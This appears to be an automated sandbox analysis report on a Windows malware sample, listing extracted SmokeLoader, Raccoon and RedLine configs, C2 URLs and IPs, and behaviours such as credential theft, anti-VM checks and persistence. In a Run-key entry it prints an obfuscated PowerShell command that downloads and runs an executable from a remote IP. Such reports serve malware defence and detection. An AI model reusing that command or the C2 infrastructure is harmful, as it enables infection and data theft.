Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-08-2021 00:43
Static task
static1
Behavioral task
behavioral1
Sample
6c0aa25e7a4fe66a0cd648fcd8728b52.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
6c0aa25e7a4fe66a0cd648fcd8728b52.exe
Resource
win10v20210410
General
-
Target
6c0aa25e7a4fe66a0cd648fcd8728b52.exe
-
Size
319KB
-
MD5
6c0aa25e7a4fe66a0cd648fcd8728b52
-
SHA1
88bca55f776aaf296e629adac6b5789b7935aa11
-
SHA256
008e443855d5e3c364f847c31e513bb48589e1cdf1a3bc622367f64062258e8e
-
SHA512
36143c741fdae41ef4652e76ee449f01beef47abecdee979ca7205bc392644b571abea30479c80d3fbf4c9740b5865314196dbb59688b0a9182db709a7897cbd
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
redline
@gasfer_dark
207.154.240.76:80
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 4252 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4944 4252 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 188 4252 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2436 4252 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 4252 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 4252 schtasks.exe -
Raccoon Stealer Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3092-177-0x00000000049E0000-0x0000000004A73000-memory.dmp family_raccoon behavioral2/memory/3092-178-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/2204-196-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon behavioral2/memory/4312-542-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\8563.exe family_redline C:\Users\Admin\AppData\Local\Temp\8563.exe family_redline C:\Users\Admin\AppData\Local\Temp\A0B0.exe family_redline C:\Users\Admin\AppData\Local\Temp\A0B0.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4064 created 3092 4064 WerFault.exe 942B.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 36 1108 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
7CC7.exe7CC7.tmp7CC7.exe7CC7.tmp8563.exe898B.exe8EFA.exefsucenter.exe942B.exeRuntimebroker.exe9B60.exeA0B0.exe8EFA.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exeWerFault.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 1076 7CC7.exe 2680 7CC7.tmp 4016 7CC7.exe 2740 7CC7.tmp 572 8563.exe 2044 898B.exe 2724 8EFA.exe 3588 fsucenter.exe 3092 942B.exe 900 Runtimebroker.exe 2204 9B60.exe 2644 A0B0.exe 4312 8EFA.exe 4640 Database.exe 4700 Database.exe 4740 install.exe 4792 HostData.exe 4816 Database.exe 4888 Database.exe 4940 Database.exe 5076 Database.exe 2608 Database.exe 5116 Database.exe 4168 Database.exe 4320 Database.exe 1800 Database.exe 4460 Database.exe 1068 Database.exe 4204 Database.exe 3676 Database.exe 4416 Database.exe 2032 Database.exe 3152 Database.exe 2092 Database.exe 1112 Database.exe 4604 Database.exe 1516 Database.exe 1124 Database.exe 2044 Database.exe 1108 Database.exe 4696 Database.exe 4444 Database.exe 4752 Database.exe 4784 install.exe 4916 Database.exe 4904 Database.exe 3412 Database.exe 4124 WerFault.exe 4088 Database.exe 1196 Database.exe 1820 Database.exe 2792 Database.exe 1800 Database.exe 2188 Database.exe 5060 Database.exe 4148 Database.exe 4204 Database.exe 408 Database.exe 4372 Database.exe 4432 Database.exe 2932 Database.exe 468 Database.exe 4008 Database.exe 2092 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe8563.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8563.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8563.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 3008 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 6 IoCs
Processes:
fsucenter.exe9B60.exepid process 3588 fsucenter.exe 2204 9B60.exe 2204 9B60.exe 2204 9B60.exe 2204 9B60.exe 2204 9B60.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\8563.exe themida C:\Users\Admin\AppData\Local\Temp\8563.exe themida behavioral2/memory/572-142-0x0000000000EE0000-0x0000000000EE1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\PerfLogs\\OfficeClickToRun.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\odt\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\PerfLogs\\ShellExperienceHost.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8563 = "\"C:\\Program Files (x86)\\Google\\Temp\\8563.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WerFault = "\"C:\\Windows\\SysWOW64\\WimBootCompress\\WerFault.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Recent\\csrss.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe8563.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8563.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SysWOW64\WimBootCompress\WerFault.exe install.exe File created C:\Windows\SysWOW64\WimBootCompress\ee201eac4591f0b16735de891f3d31be299085b8 install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
8563.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 572 8563.exe 4640 Database.exe 4640 Database.exe 4640 Database.exe 4700 Database.exe 4700 Database.exe 4700 Database.exe 4816 Database.exe 4816 Database.exe 4816 Database.exe 4888 Database.exe 4888 Database.exe 4888 Database.exe 4940 Database.exe 4940 Database.exe 4940 Database.exe 5076 Database.exe 5076 Database.exe 5076 Database.exe 2608 Database.exe 2608 Database.exe 2608 Database.exe 5116 Database.exe 5116 Database.exe 5116 Database.exe 4168 Database.exe 4168 Database.exe 4168 Database.exe 4320 Database.exe 4320 Database.exe 4320 Database.exe 1800 Database.exe 1800 Database.exe 1800 Database.exe 4460 Database.exe 4460 Database.exe 4460 Database.exe 1068 Database.exe 1068 Database.exe 1068 Database.exe 4204 Database.exe 4204 Database.exe 4204 Database.exe 3676 Database.exe 3676 Database.exe 3676 Database.exe 4416 Database.exe 4416 Database.exe 4416 Database.exe 2032 Database.exe 2032 Database.exe 2032 Database.exe 3152 Database.exe 3152 Database.exe 3152 Database.exe 2092 Database.exe 2092 Database.exe 2092 Database.exe 1112 Database.exe 1112 Database.exe 1112 Database.exe 4604 Database.exe 4604 Database.exe 4604 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
6c0aa25e7a4fe66a0cd648fcd8728b52.exe8EFA.exeinstall.exedescription pid process target process PID 3972 set thread context of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 2724 set thread context of 4312 2724 8EFA.exe 8EFA.exe PID 4740 set thread context of 4784 4740 install.exe install.exe -
Drops file in Program Files directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files (x86)\Google\Temp\8563.exe install.exe File created C:\Program Files (x86)\Google\Temp\ec5956f2652b530403e40f8f782c71845288152c install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2112 3092 WerFault.exe 942B.exe 2784 3092 WerFault.exe 942B.exe 3764 3092 WerFault.exe 942B.exe 3224 3092 WerFault.exe 942B.exe 4064 3092 WerFault.exe 942B.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
6c0aa25e7a4fe66a0cd648fcd8728b52.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c0aa25e7a4fe66a0cd648fcd8728b52.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c0aa25e7a4fe66a0cd648fcd8728b52.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c0aa25e7a4fe66a0cd648fcd8728b52.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4800 schtasks.exe 4944 schtasks.exe 188 schtasks.exe 2436 schtasks.exe 2992 schtasks.exe 5096 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b